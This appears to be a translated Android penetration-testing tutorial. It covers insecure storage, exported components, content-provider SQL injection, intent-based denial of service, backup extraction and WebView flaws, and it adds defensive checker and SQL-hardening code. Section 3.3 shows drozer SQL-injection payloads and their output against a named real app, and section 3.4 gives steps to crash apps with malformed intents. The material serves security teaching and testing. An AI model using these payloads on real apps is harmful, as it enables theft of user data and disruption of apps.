3. Mobile Security Penetration Testing - (Android basic flaw)

3.1 Data storage Vulnerability

 

Users often hand sensitive data to the app, such as:
user name and password
authentication token
contacts
communication records
usage history
.....

The app may store this private and personal information in plain text or transmit it in the clear. Usually it is stored locally, but uploading it to the network cannot be ruled out either.
• Stored locally
• Stored on the network

Stored locally

• SharedPreferences
/data/data/<package name>/shared_prefs/*.xml
If the preferences file is created without MODE_PRIVATE, other apps can read the configuration file; the root user can read it regardless.

• SQLiteDatabase
/data/data/<package name>/databases/*.db
The database is created without MODE_PRIVATE.

• InternalStorage
/data/data/<package name>/files/*
The file is created without MODE_PRIVATE.

• ExternalStorage
/mnt/sdcard/*
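The permission problem described for the three internal-storage locations is visible in the mode bits of the files on the device. The following checker is an added example (it is not code from the original post): it parses the output of `adb shell ls -l /data/data/<package>/...` and flags every entry whose "other" bits grant read or write access, which is what a file created with MODE_WORLD_READABLE or MODE_WORLD_WRITEABLE looks like on disk. The listing it parses is constructed for the example; the hard-link column is treated as optional because older Android `ls` builds omit it.

```python
import re
from dataclasses import dataclass

# Constructed sample of `adb shell ls -l /data/data/<package>/shared_prefs`
# output; these are not real device files.
SAMPLE_LISTING = """\
total 16
-rw-rw-rw- 1 u0_a123 u0_a123   812 2019-06-01 10:21 session.xml
-rw------- 1 u0_a123 u0_a123  1024 2019-06-01 10:21 settings.xml
-rw-rw-r-- 1 u0_a123 u0_a123   433 2019-06-01 10:22 token.xml
-rw-r----- 1 u0_a123 u0_a123   256 2019-06-01 10:22 cache.db
"""

# mode, optional link count, owner, group, size, date, time, name
LINE_RE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\s+(?:\d+\s+)?(?P<owner>\S+)\s+(?P<group>\S+)\s+"
    r"(?P<size>\d+)\s+\S+\s+\S+\s+(?P<name>.+)$")


@dataclass
class FileMode:
    name: str
    mode: str
    owner: str
    world_readable: bool   # what a file created with MODE_WORLD_READABLE looks like
    world_writable: bool   # what a file created with MODE_WORLD_WRITEABLE looks like


def parse_listing(text):
    """Parse `ls -l` lines into FileMode records; non-matching lines (e.g. 'total') are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        mode = m.group("mode")
        # Characters 7-9 are the rwx bits for "other" users. On Android every app
        # runs under its own uid, so "other" means every other installed app.
        others = mode[7:10]
        entries.append(FileMode(m.group("name"), mode, m.group("owner"),
                                "r" in others, "w" in others))
    return entries


def insecure_files(text):
    """Names of files that any other app on the device could read or modify."""
    return [e.name for e in parse_listing(text) if e.world_readable or e.world_writable]


if __name__ == "__main__":
    for entry in parse_listing(SAMPLE_LISTING):
        flag = "WORLD-ACCESSIBLE" if entry.world_readable or entry.world_writable else "ok"
        print("%-12s %s %s" % (entry.mode, entry.name, flag))
```

Run it against a real listing by piping `adb shell ls -l /data/data/<package>/shared_prefs` into `parse_listing`; on a non-rooted device the listing itself requires the app to be debuggable or the shell to have access, so this is easiest on a test device or emulator. A file that is private (`-rw-------` or `-rw-rw----`) is still readable by root, exactly as the text says; the checker only distinguishes what other unprivileged apps can reach.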


Further reading
Analysis http://www.droidsec.cn/android-database configuration mode security risk /
http://www.droidsec.cn/android local data storage: internal-storage Security Risk Analysis /

3.2 Components exposed vulnerabilities

1. android:exported

All four component types have an android:exported attribute.
If exported is true, the component may be invoked by other apps; if it is false, the component cannot be invoked from outside.
<activity
    android:name=".PartActivity"
    android:theme="@android:style/Theme.Dialog"
    android:exported="true">
</activity>

Developers often leave out the exported attribute when defining a component, so what does the system use as the default?
If the component declares an intent-filter, Android assumes it may be invoked by an external implicit intent, so the default is exported=true.
If the component has no intent-filter, Android assumes it is an internal component reachable only by explicit intent, so the default is exported=false.


2. Quick test

adb forward tcp:31415 tcp:31415
drozer console connect

Determine the attack surface:
run app.package.attacksurface <package name>
Get activity information:
run app.activity.info -a <package name>
Start an activity:
run app.activity.start --component <package name> <package name>.XXActivity

Authentication bypass
Once an activity is exposed to third-party calls, it may allow logging in without a password or resetting the password.

Privilege escalation
A low-privilege app invokes an exposed component of a high-privilege app and thereby performs a high-privilege action.


3. Access control on components

To harden the four component types, a component can declare a permission that callers must hold:
<activity
    android:name=".PartActivity"
    android:theme="@android:style/Theme.Dialog"
    android:permission="com.example.test.permission">
</activity>

<permission android:name="com.example.test.permission"
    android:protectionLevel="dangerous"
    android:label="test"
    android:description="test_permission" />

An app that wants to invoke the component must request the permission in its own AndroidManifest.xml:
<uses-permission android:name="com.example.test.permission" />
If android:protectionLevel is signature, only apps signed with the same private key as this application can be granted the permission.
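The default-export rules and the permission guard above can be checked mechanically from the manifest. The following auditor is an added example, not code from the original post or from drozer: it parses an AndroidManifest.xml, applies the rules stated in the text (an explicit android:exported wins; otherwise an intent-filter makes the component exported) and reports each component together with whether it is guarded by a permission and how strong that permission's protectionLevel is. It goes slightly beyond the text in two places: it handles the content-provider exception (providers default to exported=true when minSdkVersion or targetSdkVersion is 16 or lower) and it also reports android:allowBackup, the flag discussed in section 3.5. The manifest embedded below is constructed for the example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")
STRONG_LEVELS = ("signature", "signatureOrSystem")

# Constructed sample manifest (not taken from any real app); it mixes explicit
# and defaulted exports so every branch of the rules is exercised.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.test">
  <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="28"/>
  <permission android:name="com.example.test.permission"
      android:protectionLevel="signature"/>
  <application android:allowBackup="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PartActivity" android:exported="true"
        android:permission="com.example.test.permission"/>
    <activity android:name=".InternalActivity"/>
    <receiver android:name=".PushReceiver">
      <intent-filter><action android:name="com.example.test.PUSH"/></intent-filter>
    </receiver>
    <service android:name=".SyncService" android:exported="true"/>
    <provider android:name=".CityProvider" android:authorities="com.example.test.city"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an android:-namespaced attribute, or None if absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def sdk_levels(root):
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1, 1
    return (int(attr(uses_sdk, "minSdkVersion") or 1),
            int(attr(uses_sdk, "targetSdkVersion") or 1))


def effective_exported(elem, min_sdk, target_sdk):
    """Explicit attribute wins; otherwise an intent-filter means exported.
    Providers are the exception: on API 16 and lower they defaulted to exported=true."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true", "explicit"
    if elem.find("intent-filter") is not None:
        return True, "default: has intent-filter"
    if elem.tag == "provider" and (min_sdk < 17 or target_sdk < 17):
        return True, "default: provider on API < 17"
    return False, "default: no intent-filter"


def audit_manifest(xml_text):
    root = ET.fromstring(xml_text)
    min_sdk, target_sdk = sdk_levels(root)
    # protectionLevel of every permission this app declares itself
    levels = {attr(p, "name"): (attr(p, "protectionLevel") or "normal")
              for p in root.iter("permission")}
    app = root.find("application")
    components = []
    for elem in app:
        if elem.tag not in COMPONENT_TAGS:
            continue
        exported, reason = effective_exported(elem, min_sdk, target_sdk)
        perm = attr(elem, "permission")  # providers may also use readPermission/writePermission
        if not exported:
            risk = "not exported"
        elif perm is None:
            risk = "exported without permission"
        elif levels.get(perm) in STRONG_LEVELS:
            risk = "exported, signature-guarded"
        else:
            risk = "exported, guarded by %s permission" % (levels.get(perm) or "undeclared")
        components.append({"type": elem.tag, "name": attr(elem, "name"), "exported": exported,
                           "reason": reason, "permission": perm, "risk": risk})
    return {"allowBackup": attr(app, "allowBackup"), "components": components}


if __name__ == "__main__":
    report = audit_manifest(SAMPLE_MANIFEST)
    print("allowBackup =", report["allowBackup"])
    for c in report["components"]:
        print("%-8s %-18s exported=%-5s (%s) -> %s"
              % (c["type"], c["name"], c["exported"], c["reason"], c["risk"]))
```

To run it on a real app, decode the binary manifest first (for example with apktool) and feed the resulting XML to `audit_manifest`. The launcher activity is necessarily exported without a permission; the interesting findings are the other "exported without permission" rows and any exported component whose guard is only a normal or dangerous permission, which any app can request.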

 


Further reading
https://bugs.secquan.org/bugs/WooYun-2014-48501
http://www.droidsec.cn/content-provider file directory traversal vulnerability analysis /

3.3 APP SQL injection vulnerabilities

Connect to the emulator / real device:

nox_adb.exe connect 127.0.0.1:62001

Forward the port used by drozer (31415):
adb forward tcp:31415 tcp:31415


Open the drozer console:
drozer console connect


Get content provider information:
run app.provider.info -a com.qijia.o2o

Provider of interest: com.qijia.o2o.provider.CityProvider
Authority: content://com.qijia.o2o


Scan for SQL injection:
run scanner.provider.injection -a com.qijia.o2o
Not Vulnerable:
content://com.tencent.mm.sdk.plugin.provider/sharedpref/
content://com.sina.weibo.sdkProvider/query/package
content://com.tencent.mm.sdk.comm.provider/jumpToBizProfile
content://downloads.com.qijia.o2o
content://telephony/carriers/preferapn/
content://com.tencent.mm.sdk.comm.provider/openRankList
content://com.tencent.mm.sdk.comm.provider/joinChatroom/
content://com.tencent.mm.sdk.comm.provider/createChatroom/
content://downloads./
content://com.tencent.mm.sdk.comm.provider/addCardToWX/
content://com.qijia.o2o/full/
content://com.qijia.o2o/children
content://com.qijia.o2o/children/
content://com.qijia.o2o/
content://com.sina.weibo.sdkProvider/query/package/
content://telephony/carriers/preferapn
content://com.tencent.mm.sdk.comm.provider/openBusiLuckyMoney
content://downloads.com.qijia.o2o/
content://com.tencent.mm.sdk.comm.provider/jumpToBizTempSession/
content://com.tencent.mm.sdk.comm.provider/jumpToBizProfile/
content://orm
content://com.qijia.o2o/full
content://com.tencent.mm.sdk.comm.provider/addCardToWX
content://com.tencent.mm.sdk.comm.provider/joinChatroom
content://orm/
content://com.tencent.mm.sdk.comm.provider/jumpToBizTempSession
content://com.tencent.mm.sdk.plugin.provider/sharedpref
content://com.tencent.mm.sdk.comm.provider/createChatroom
content://com.tencent.mm.sdk.comm.provider/openWebview/
content://com.qijia.o2o
content://com.tencent.mm.sdk.comm.provider/openRankList/
content://com.tencent.mm.sdk.comm.provider/openWebview
content://downloads.
content://com.tencent.mm.sdk.comm.provider/openBusiLuckyMoney/

Injection in Projection:
content://com.qijia.o2o/provinces
content://com.qijia.o2o/provinces/

Injection in Selection:
content://com.qijia.o2o/provinces
content://com.qijia.o2o/provinces/


Trigger a SQL error:
run app.provider.query content://com.qijia.o2o/provinces --projection "'"
unrecognized token: "' FROM areas WHERE parent = ''" (code 1): , while compiling: SELECT ' FROM areas WHERE parent = ''

Start a web service on the host that relays queries to the content provider on the phone; this can also be combined with sqlmap:
run auxiliary.webcontentresolver


http://localhost:8080/query?uri=content://com.qijia.o2o/provinces&projection='
SELECT ' FROM areas WHERE parent =

http://localhost:8080/query?uri=content://com.qijia.o2o/provinces&projection=*#
SELECT * FROM areas WHERE parent =
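The error above comes from a provider that splices the caller's projection and selection straight into its SQL string. The following is an added example (not code from the original post or from the app in question) that reproduces that construction against an in-memory SQLite table modelled on the `areas` table in the error message, then shows the hardened form: projection columns are checked against an allow-list and the selection value is bound as a parameter instead of being quoted into the string. The table contents are constructed.

```python
import sqlite3

# Columns a caller is allowed to project; anything else is rejected outright
ALLOWED_COLUMNS = {"_id", "name", "parent"}


def make_db():
    """Constructed stand-in for the provider's backing database (an `areas` table)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE areas (_id INTEGER PRIMARY KEY, name TEXT, parent TEXT)")
    conn.executemany("INSERT INTO areas (name, parent) VALUES (?, ?)",
                     [("Beijing", ""), ("Haidian", "Beijing"), ("Shanghai", "")])
    return conn


def vulnerable_query(conn, projection, parent):
    """Pastes the caller-supplied projection and selection value into the SQL text.
    A projection of a single quote yields the same 'unrecognized token' error the
    drozer query produced. Returns ("ok", rows) or ("error", message)."""
    sql = "SELECT %s FROM areas WHERE parent = '%s'" % (projection, parent)
    try:
        return "ok", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def hardened_query(conn, projection, parent):
    """Allow-lists projection columns and binds the selection value as a parameter,
    so neither argument can change the shape of the statement."""
    columns = [c.strip() for c in projection.split(",")]
    unknown = [c for c in columns if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError("rejected projection columns: %r" % unknown)
    sql = "SELECT %s FROM areas WHERE parent = ?" % ", ".join(columns)
    return conn.execute(sql, (parent,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, projection \"'\":", vulnerable_query(db, "'", ""))
    print("vulnerable, parent O'Brien :", vulnerable_query(db, "name", "O'Brien"))
    print("hardened,   name/Beijing  :", hardened_query(db, "name", "Beijing"))
    print("hardened,   parent O'Brien:", hardened_query(db, "name", "O'Brien"))
    try:
        hardened_query(db, "'", "")
    except ValueError as exc:
        print("hardened,   projection \"'\":", exc)
```

In an Android provider the same two controls are available directly: `SQLiteQueryBuilder.setProjectionMap()` (optionally with `setStrict(true)`) restricts which columns a caller may name, and passing the caller's `selectionArgs` through to `query()` binds them as parameters. Note that the hardened version also rejects a projection of `*`, which is why the `projection=*` request above, which dumps every column, would no longer work against it.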

 

3.4 Local Denial of Service Vulnerability

Local denial-of-service vulnerabilities in Android apps arise when the program calls Intent.getXXXExtra() without catching exceptions while processing abnormal or malformed data.

An attacker sends the victim app an intent carrying empty, abnormal or malformed data, causing it to crash.


A local denial of service can not only cause the app's security and protective functions to be bypassed or fail (antivirus apps, security guards, secure lock screens, etc.),

it can also be used by a competitor to attack a rival app, crashing it and causing economic loss of varying degrees.

Testing
Determine the attack surface:
dz> run app.package.attacksurface <package name>
Get activity information:
dz> run app.activity.info -a com.nineteenlou.nineteenlou
Start an activity:
dz> run app.activity.start --component com.nineteenlou.nineteenlou com.tencent.tauth.TAuthView
Get broadcast receiver information:
dz> run app.broadcast.info -a <package name>
Send a broadcast with a null action to a broadcast receiver:
dz> run app.broadcast.send --component <package name> <broadcast receiver name>


Detailed analysis and repair
Android client information disclosure and denial of service vulnerability
https://bugs.secquan.org/bugs/WooYun-2015-119959

https://www.secpulse.com/archives/3859.html

3.5 allowbackup backup risk

The AndroidManifest.xml explicitly sets android:allowBackup="true".
Back up the app:
adb backup -f E:\back.ab -noapk <package name>
A backup password may or may not be entered on the device.

Use android-backup-extractor (abe) to unpack the .ab file:
https://github.com/nelenkov/android-backup-extractor/releases

java -jar abe.jar unpack back.ab applock.tar

The extracted archive contains SmartLockConfig.xml.

Real cases:
Backing up a password lock without root: https://blog.csdn.net/qq_31387043/article/details/51452782
Weibo app backup: https://blog.csdn.net/chuyouyinghe/article/details/53609806

3.6 activity hijacking

A user opens an application on an Android phone and navigates to the login page.
At that moment, malicious software detects the user's action and immediately pops up an Activity with the same interface as the application, covering the legitimate Activity.
The user can hardly notice; the user name and password entered next are actually typed into the malware's Activity.


Activity hijacking example and protective measures
http://blog.chinaunix.net/uid-29170659-id-4930737.html

3.7 WebView: plain-text storage, code execution and same-origin policy vulnerabilities

WebView

Many apps now embed web pages (hybrid apps), for example many e-commerce platforms: Taobao, Jingdong, Juhuasuan, etc.


This is implemented with Android's WebView.
There are many pitfalls in using WebView, and they can easily lead to dangerous leaks of user data.

 

WebView file-domain same-origin policy


http://www.droidsec.cn/webview-file domain origin policy bypass vulnerability analysis /

 

WebView plain-text storage


Case: https://bugs.secquan.org/bugs/WooYun-2013-20246
WebView enables the password-saving feature by default:

myWebView.getSettings().setSavePassword(true);  // the default; the setter lives on WebSettings, not on the WebView itself

 

WebView code execution


https://www.52pojie.cn/thread-322022-1-1.html
https://blog.csdn.net/u012195899/article/details/68942725

 

WormHole vulnerability


https://blog.csdn.net/jltxgcy/article/details/50686858

App clone vulnerability analysis https://blog.csdn.net/xwh_1230/article/details/79045251


Source: www.cnblogs.com/hack404/p/10981235.html